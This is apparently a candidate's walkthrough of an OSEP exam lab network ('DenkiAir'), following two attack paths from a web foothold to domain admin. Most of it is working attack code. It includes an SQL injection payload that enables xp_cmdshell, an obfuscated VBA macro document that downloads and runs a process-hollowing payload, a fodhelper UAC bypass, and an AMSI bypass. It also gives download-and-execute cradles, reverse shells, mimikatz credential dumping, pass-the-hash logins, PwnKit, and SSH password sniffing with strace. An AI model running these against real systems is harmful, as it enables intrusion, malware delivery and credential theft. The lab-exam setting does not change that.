OSEP DenkiAir

June2022

Exam path 1

DB01
During nmap scan found a web application running on port 80 on
192.xxx.xxx.xxx. The website allowed to book flight tickets.
And also allowed to filter route based on source and destination
with src and dst parameters. And found that src parameter is
vulnerable to SQL Injection and got access to DB01.denkiair-
ops.com with SQL injection as .

SeImpersonatePrivilege was enabled on DB01 and was able to

privilege escalate using printspoofer.

When src given always true condition (' or 1=1;--) it prints all
the source and destination. Chance of SQLi.
ExamServices#4864
Give the src= below payload(below command is used to
execute process hollowing shellcode runner. Can be any
command):

';EXECUTE AS LOGIN = 'sa';EXEC sp_configure'show

advanced options', 1; RECONFIGURE; EXEC sp_configure
'xp_cmdshell', 1; RECONFIGURE;EXEC xp_cmdshell
 'powershell.exe -exec bypass -enc
JABkAGEAdABhACAAPQAgACgATgBlAxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxAGwAKQA7AA=='--

And we got shell on DB01.

DB01 privesc
SeImpersonatePrivilege is enabled

SeImpersonatePrivilege is enabled. GitHub -

itm4n/PrintSpoofer: Abusing Impersonation Privileges on
Windows 10 and Server 2019
Disable Defender.

Upload printspoofer and run it.

PrintSpoofer.exe -i -c cmd

And we are system.

Lateral movement from DB01 to COM1

After dumping credentials using mimikatz found NTLM hash of
Mohammad.George user. And was able to crack the NTLM hash
with johntheripper. And he was allowed to SSH into COM01.

Dump credentials with mimikatz.

mimikatz.exe "privilege::debug" "!+" "!processprotect

/process:lsass.exe /remove" "token::elevate"
"sekurlsa::elevate" "sekurlsa::logonpasswords"
"lsadump::lsa /patch" "exit"

Found NTLM hash of Mohammad.George:

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.
Cracked the hash with JohnTheRipper:
 john --format=NT hashes.txt --
wordlist=/usr/share/wordlists/rockyou.txt

And found the pasword is Iloveyou1

And Mohammad.George can ssh into COM1 with same

credentail.

proxychains -q ssh Mohammad.George@172.xxx.xxx.xxx

Lateral movement to Client01Running
services

systemctl --type=service

And found:

rocketchat.service
loaded active running The Rocket.Chat server
Look at /usr/lib/systemd/system/rocketchat.service and found
how to rocketchat mongo db.

Install mongos shell and connect to mongodb://db02.denkiair-

ops.com:27017/rocketchat

sudo proxychains -q mongo "mongodb://db02.denkiair-

ops.com:27017/rocketchat"

When enumerating mongodb found that someone is looking for

denki_proj_wip.docm:

MongoDB shell version v5.0.9

connecting to: mongodb://db02.denkiair-
ops.com:27017/rocketchat?
compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("ec516f28-
377a-468a-a06f-3f72208d7508") }
MongoDB server version: 5.0.3
================
Warning: the "mongo" shell has been superseded by
"mongosh",
which delivers improved usability and
compatibility.The "mongo" shell has been deprecated
and will be removed in
an upcoming release.
For installation instructions, see
https://docs.mongodb.com/mongodb-shell/install/
================
Welcome to the MongoDB shell.
For interactive help, type "help".
For more comprehensive documentation, see
https://docs.mongodb.com/
Questions? Try the MongoDB Developer Community Forums
https://community.mongodb.com
---
The server generated these startup warnings when
booting:
2022-05-30T00:25:18.215-07:00: Access control
is not enabled for the database. Read and write
access to data and configuration is unrestricted
---
---
Enable MongoDB's free cloud-based monitoring
service, which will then receive and display
metrics about your deployment (disk
utilization, CPU, operation statistics, etc).

The monitoring data will be available on a

MongoDB website with a unique URL accessible to you
and anyone you share the URL with. MongoDB
may use this information to make product
improvements and to suggest MongoDB products
and deployment options to you.

To enable free monitoring, run the following

command: db.enableFreeMonitoring()
To permanently disable this reminder, run the
following command: db.disableFreeMonitoring()
---
rs01:PRIMARY> show dbs
admin 0.000GB
config 0.000GB
local 0.019GB
rocketchat 0.006GB
rs01:PRIMARY> use rocketchat
switched to db rocketchat
rs01:PRIMARY> show collections
_raix_push_app_tokens
instances
meteor_accounts_loginServiceConfiguration
meteor_oauth_pendingCredentials
meteor_oauth_pendingRequestTokens
migrations
omnichannel_auto_close_on_hold_scheduler
omnichannel_queue_inactivity_monitor
omnichannel_scheduler
rocketchat trash
rocketchat_analytics
rocketchat_apps
rocketchat_apps_logs
rocketchat_apps_persistence
rocketchat_apps_scheduler
rocketchat_avatars
rocketchat_avatars.chunks
rocketchat_avatars.files
rocketchat_banner
rocketchat_banner_dismiss
rocketchat_canned_response
rocketchat_credential_tokens
rocketchat_cron_history
rocketchat_custom_emoji
rocketchat_custom_sounds
rocketchat_custom_user_status
rocketchat_email_inbox
rocketchat_email_message_history
rocketchat_export_operations
rocketchat_federation_dns_cache
rocketchat_federation_keys
rocketchat_federation_room_events
rocketchat_federation_servers
rocketchat_import
rocketchat_import_data
rocketchat_integration_history
rocketchat_integrations
rocketchat_invites
rocketchat_livechat_agent_activity
rocketchat_livechat_business_hours
rocketchat_livechat_custom_field
rocketchat_livechat_department
rocketchat_livechat_department_agents
rocketchat_livechat_external_message
rocketchat_livechat_inquiry
rocketchat_livechat_page_visited
rocketchat_livechat_priority
rocketchat_livechat_tag
rocketchat_livechat_trigger
rocketchat_livechat_unit_monitors
rocketchat_livechat_visitor
rocketchat_message
rocketchat_message_read_receipt
rocketchat_notification_queue
rocketchat_nps
rocketchat_nps_vote
rocketchat_oauth_apps
rocketchat_oembed_cache
rocketchat_omnichannel_queue
rocketchat_permissions
rocketchat_reports
rocketchat_roles
rocketchat_room
rocketchat_server_events
rocketchat_sessions
rocketchat_settings
rocketchat_smarsh_history
rocketchat_statistics
rocketchat_subscription
rocketchat_team
rocketchat_team_member
rocketchat_uploads
rocketchat_user_data_files
rocketchat_webdav_accounts
ufsTokens
users
usersSessions
rs01:PRIMARY> db.rocketchat_room.find()
{ "_id" : "GENERAL", "ts" : ISODate("2021-11-
12T10:30:14.143Z"), "t" : "c", "name" : "general",
"usernames" : [ ], "msgs" : 6, "usersCount" : 3,
"default" : true, "_updatedAt" : ISODate("2021-11-
 18T10:09:14.708Z"), "lastMessage" : { "_id" :
"FawnHo6e2aX6dbHAA", "rid" : "GENERAL", "msg" :
"hey", "ts" : ISODate("2021-11-18T10:09:14.691Z"),
"u" : { "_id" : "dqf7zEioxHbruaja6", "username" :
"guy.edwards", "name" : "guy edwards" }, "urls" : [
], "mentions" : [ ], "channels" : [ ], "md" : [ {
"type" : "PARAGRAPH", "value" : [ { "type" :
"PLAIN_TEXT", "value" : "hey" } ] } ], "_updatedAt" :
ISODate("2021-11-18T10:09:14.701Z") }, "lm" :
ISODate("2021-11-18T10:09:14.691Z") }
{ "_id" : "dLwqQqqE7sH63EREy", "fname" : "dev",
"customFields" : { }, "description" : "development
channel", "broadcast" : false, "encrypted" : false,
"name" : "dev", "t" : "c", "msgs" : 5, "usersCount" :
3, "u" : { "_id" : "iM4zdioSyuizfHmke", "username" :
"support" }, "ts" : ISODate("2021-11-
18T10:04:08.559Z"), "ro" : false, "_updatedAt" :
ISODate("2021-11-30T16:19:24.353Z"), "lastMessage" :
{ "_id" : "52oqTesGqcgRGgckq", "rid" :
"dLwqQqqE7sH63EREy", "msg" : "I will save it as
\"denki_proj_wip.docm\", you can ignore any other
files", "ts" : ISODate("2021-11-30T16:19:24.254Z"),
"u" : { "_id" : "k4R3ekkXJaiH2Zxg7", "username" :
"ian.murphy", "name" : "ian murphy" }, "urls" : [ ],
"mentions" : [ ], "channels" : [ ], "md" : [ { "type"
: "PARAGRAPH", "value" : [ { "type" : "PLAIN_TEXT",
"value" : "I will save it as \"denki_proj_wip.docm\",
you can ignore any other files" } ] } ], "_updatedAt"
: ISODate("2021-11-30T16:19:24.306Z") }, "lm" :
ISODate("2021-11-30T16:19:24.254Z") }
rs01:PRIMARY> ^C
bye

While checking /etc/samba/smb.conf found that /transfer

share.
Lets try add docm

Create a .docm in denki_proj_wip.docm.

Add malicious macro file which will downlaod process hollowing

dll file and execute it:

Payload encrypter

$payload = "powershell -exec bypass -nop -w hidden -c

iex((new-object
system.net.webclient).downloadstring('http://192.xxx.
xxx.xxx/dll.txt'))"
[string]$output = ""
$payload.ToCharArray() | %{
[string]$thischar = [byte][char]$_ + 17
if($thischar.Length -eq 1)
{
$thischar = [string]"00" + $thischar
$output += $thischar
}
elseif($thischar.Length -eq 2)
 {
$thischar = [string]"0" + $thischar
$output += $thischar
}
elseif($thischar.Length -eq 3)
{
$output += $thischar
}
}
$output | clip

Paste as apples in below vba code.

File name encrypter

$payload = "denki_proj_wip.docm"
[string]$output = ""
$payload.ToCharArray() | %{
[string]$thischar = [byte][char]$_ + 17
if($thischar.Length -eq 1)
{
$thischar = [string]"00" + $thischar
$output += $thischar
}
elseif($thischar.Length -eq 2)
{
$thischar = [string]"0" + $thischar
$output += $thischar
}
elseif($thischar.Length -eq 3)
{
$output += $thischar
}
}
$output | clip
Paste inside If ActiveDocument.Name <> Nuts("")

vba code

Sub SubstitutePage()
ActiveDocument.Content.Select
Selection.Delete

ActiveDocument.AttachedTemplate.AutoTextEntries("TheD
oc").Insert Where:=Selection.Range, RichText:=True
MyMacro
End Sub
Function Pears(Beets)
Pears = Chr(Beets - 17)
End Function
Function Strawberries(Grapes)
Strawberries = Left(Grapes, 3)
End Function
Function Almonds(Jelly)
Almonds = Right(Jelly, Len(Jelly) - 3)
End Function
Function Nuts(Milk)
Do
Oatmilk = Oatmilk + Pears(Strawberries(Milk))
Milk = Almonds(Milk)
Loop While Len(Milk) > 0
Nuts = Oatmilk
End Function

Function MyMacro()
If ActiveDocument.Name <>
Nuts("11711812712412211212913112812311213612212906311
7128116126") Then
Exit Function
End If
Dim Apples As String
Dim Water As String
 Apples =
"129128xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx056058058"
Wait (5)
Water = Nuts(Apples)

GetObject(Nuts("136122127126120126133132075")).Get(Nu
ts("104122127068067112097131128116118132132")).Create
Water, Tea, Coffee, Napkin
End Function

Sub AutoOpen()
MyMacro
SubstitutePage
End Sub

Sub Document_Open()
MyMacro
SubstitutePage
End Sub

Sub Wait(n As Long)

Dim t As Date
t = Now
Do
DoEvents
Loop Until Now >= DateAdd("s", n, t)
End Sub

Copy the denki proj wip.docm to /transfer folder in COM1 and

start meterpreter listner.

After a while we have connection from client01 as DENKIAIR-

OPS\Guy.Edwards.
Below code to run amsi and powershell hollowing dll.

New-Item -Path HKCU:\Software\Classes\ms-

settings\shell\open\command -Value "powershell.exe -
exec bypass -enc
JABhAD0AWwBSAGUAZxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxAB5AF0AOgA6AEwAbwBhAGQAKAAkAGQAY
QB0AGEAKQA7ACAAJABjAGwAYQBzAHMAIAA9ACAAJABhAHMAcwBlAG
0ALgBHAGUAdABUAHkAcABlACgAIgBQAHIAbwBjAGUAcwBzAEgAbwB
sAGwAbwB3AGkAbgBnAEQAZQBjAHIAeQBwAHQAZQxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxJABuAHUAbABsACkAOwA=" -
Force

New-ItemProperty -Path HKCU:\Software\Classes\ms-

settings\shell\open\command -Name DelegateExecute -
PropertyType String -Force

C:\Windows\System32\fodhelper.exe
Lateral movement to DC01

mimikatz

mimikatz.exe "privilege::debug" "!+" "!processprotect

/process:lsass.exe /remove" "token::elevate"
"sekurlsa::elevate" "sekurlsa::logonpasswords"
"lsadump::lsa /patch" "exit"

Got hash of ian.murphy who is domain admin.

proxychains -q evil-winrm -i 172.xxx.xxx.xxx -u

ian.murphy -H 3f7d718361e4c84997f08f22fe7b38ee

Lateral movement web01

 proxychains -q evil-winrm -i 172.xxx.xxx.xxx -u
ian.murphy -H 3f7d718361e4c84997f08f22fe7b38ee

Lateral movement web03

proxychains -q evil-winrm -i 172.xxx.xxx.xxx -u

ian.murphy -H 3f7d718361e4c84997f08f22fe7b38ee

Lateral movement db02

proxychains -q evil-winrm -i 172.xxx.xxx.xxx -u

ian.murphy -H 3f7d718361e4c84997f08f22fe7b38ee

Exam path 2
web02
There is a option to apply job.
There upload functionality and we can uplaod phtml file.
When directory brute forcing found http://192.xxx.xxx.xxx/db/
When browsing to the page found that app.db.

After downloading the app.db and going through found that it is

renaming files and was able to see the path.

Start nc listner.
 nc -nvlp 443

Browser to http://192.xxx.xxx.xxx/uploads/xxxxxxx.phtml

And got reverse shell.

Get a stale shell with socat:

Start listener:

socat file:`tty`,raw,echo=0 tcp-listen:4444

Copy socat binary to the web02 and give it executable

permission.

chmod +x socat

./socat exec:'bash -li',pty,stderr,setsid,sigint,sane

tcp:192.xxx.xxx.xxx:4444
And we have stable shell.

web02 Privesc
Run 2021 PwnKit(CVE-2021-4034) from GitHub - ly4k/PwnKit:
Self-contained exploit for CVE-2021-4034 - Pkexec Local
Privilege Escalation

Compile the code and transfer it to web02.

gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC

Run Pwnkit:

chmod +x PwnKit
./PwnKit

web02 Persistance
Change the password of the root user.

passwd

SSH into the root session and give new password:

ssh root@192.xx.xxx.xxx

web02 lateral movement to

admin01(lisa.price@denkiair.com)
Found krb5cc 1xxx xxxxx in /tmp.
The krb5cc cache file was changing naming every few second.
Hence there is some network activity from lisa.price.

With tcpdump dumbped the network.

tcpdump -i ens192 -w capture_file

And transfered capture file to kali and open in wireshark to

inspect. While enumerating found credentails of lisa.price.
As we are root permission on web02 we can change user to
lisa.price@denkiair.com

su lisa.price@denkiair.com

And we can ssh to 172.16.106.115 (admin01)

(admin01) privesc

We have all sudo permission.

Run below command to escalate privilege escalate to root.

sudo /bin/bash
admin01 to admin02 lateral
movement
There is network activity going on from matthew.lucas

tcpdump -i ens160 -w capture_file_admin01

And transfer the file to kali.

Upload the file to wireshark. And found that there is a regular

ssh connection coming from 172.xxx.xxx.xxx.

As we have root acess on admin01 we can use strace to get the

credentials. Spying on ssh password using strace | by debojit |
Medium

Run below command to get the process id:

ps aux | grep ssh

And we got the process id: 34511. Run strace to find the
credential.

sudo strace -p xxxxx

And the credentials is Hxxxxxxxxxx_.

Use psexec to login to `172.xxx.xxx.xxx.

proxychains -q python3 /usr/share/doc/python3-

impacket/examples/psexec.py
matthew.lucas:Hxxxxxxxxxx_@172.xxx.xxx.xxx

And access on admin02.

admin02 Privileage escalation

SeImpersonatePrivilege is enabled. GitHub -
itm4n/PrintSpoofer: Abusing Impersonation Privileges on
Windows 10 and Server 2019

Disable defender.
Upload printspoofer and run it.

And we have system privileages.

admin02 matthew to molly

Disable AMSI

$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if

($b.Name -like "*iUtils")
{$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach(
$e in $d) {if ($e.Name -like "*Context")
{$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;
[Int32[]]$buf = @(0);
[System.Runtime.InteropServices.Marshal]::Copy($buf,
0, $ptr, 1)

(new-object
system.net.webclient).downloadstring('http://192.xxx.
xxx.xxx/SharpHound.ps1') | IEX
 Invoke-BloodHound -CollectionMethod All

Invoke-BloodHound -CollectionMethod All -Domain

denkir-prod.com

hashdump admin02

mimikatz.exe "privilege::debug" "token::elevate"

"sekurlsa::elevate" "sekurlsa::logonpasswords"
"lsadump::lsa /patch" "exit"

Found credentials for DENKIAIR\molly.dickinson:

D7oxxxxxxxx9fX

lateral movement as molly

Enable RDP:

reg add
"HKLM\SYSTEM\CurrentControlSet\Control\Terminal
Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

netsh advfirewall firewall set rule group="remote

desktop" new enable=yes
 proxychains -q xfreerdp /v:172.xxx.xxx.xxx
/u:matthew.lucas /p:Hxxxxxxxx_ +compression
+clipboard /dynamic-resolution +toggle-fullscreen
/cert-ignore /timeout:25000

In cmd run:

runas /user:DENKIAIR\molly.dickinson "powershell -ep

bypass"

Lateral move to molly to kyle

(new-object
system.net.webclient).downloadstring('http://192.xxx.
xxx.xxx/PowerView.ps1') | IEX

Set-DomainUserPassword -Identity
KYLE.COLE@DENKIAIR.COM -AccountPassword (ConvertTo-
SecureString 'Password123' -AsPlainText -Force) -
Verbose
ShareLemon
Scan 172.16.106.112 with nmap and port 5000 is open.

Goto http://app01.denkiair.com:5000 from edge. And login

with credential:

KYLE.COLE:Password123